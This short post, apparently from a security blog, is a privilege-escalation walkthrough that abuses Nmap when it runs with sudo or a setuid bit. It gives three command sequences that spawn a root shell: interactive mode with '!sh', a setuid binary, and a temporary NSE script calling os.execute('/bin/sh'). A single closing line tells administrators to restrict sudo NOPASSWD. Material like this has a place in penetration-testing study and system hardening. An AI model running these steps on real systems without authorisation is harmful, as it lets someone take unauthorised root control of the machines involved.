Nmap is a scanner for network and OS services detection. However, if misconfigured to be used with “sudo” or “administrator” privileges can lead to a privilege escalation.

Exploit 1

1. Check what sudo permission the current user has, desired “NOPASSWD”

  • sudo -l

2. Execute Nmap in interactive mode

  • sudo nmap –interactive

3. Nmap has been run with “sudo” privileges. Run a shell inside the Nmap interactive prompt

  • !bash or !sh
  • whoami

Exploit 2

1. Having sticky bit permission I get a root shell using ‘!sh’ and now ‘!bash’ so it is worthy to try different shells.

  • ls -l /usr/local/bin/nmap

2. Accessing interactive mode we can run the shell

  • nmap –interactive
  • !bash
  • whoami
  • exit
  • !sh
  • whoami

Exploit 3

1. In case that “–interactive” is not an option

  • sudo -l
  • sudo -u root nmap –interactive

2. We will now try playing with environmental variables

  • TF=$(mktemp)
  • echo ‘os.execute(“/bin/sh”)’ > $TF
  • sudo nmap –script=$TF

3. We now are root

  • bash
  • whoami; date; hostname


Limit the commands a user has access with using sudo (NOPASSWD).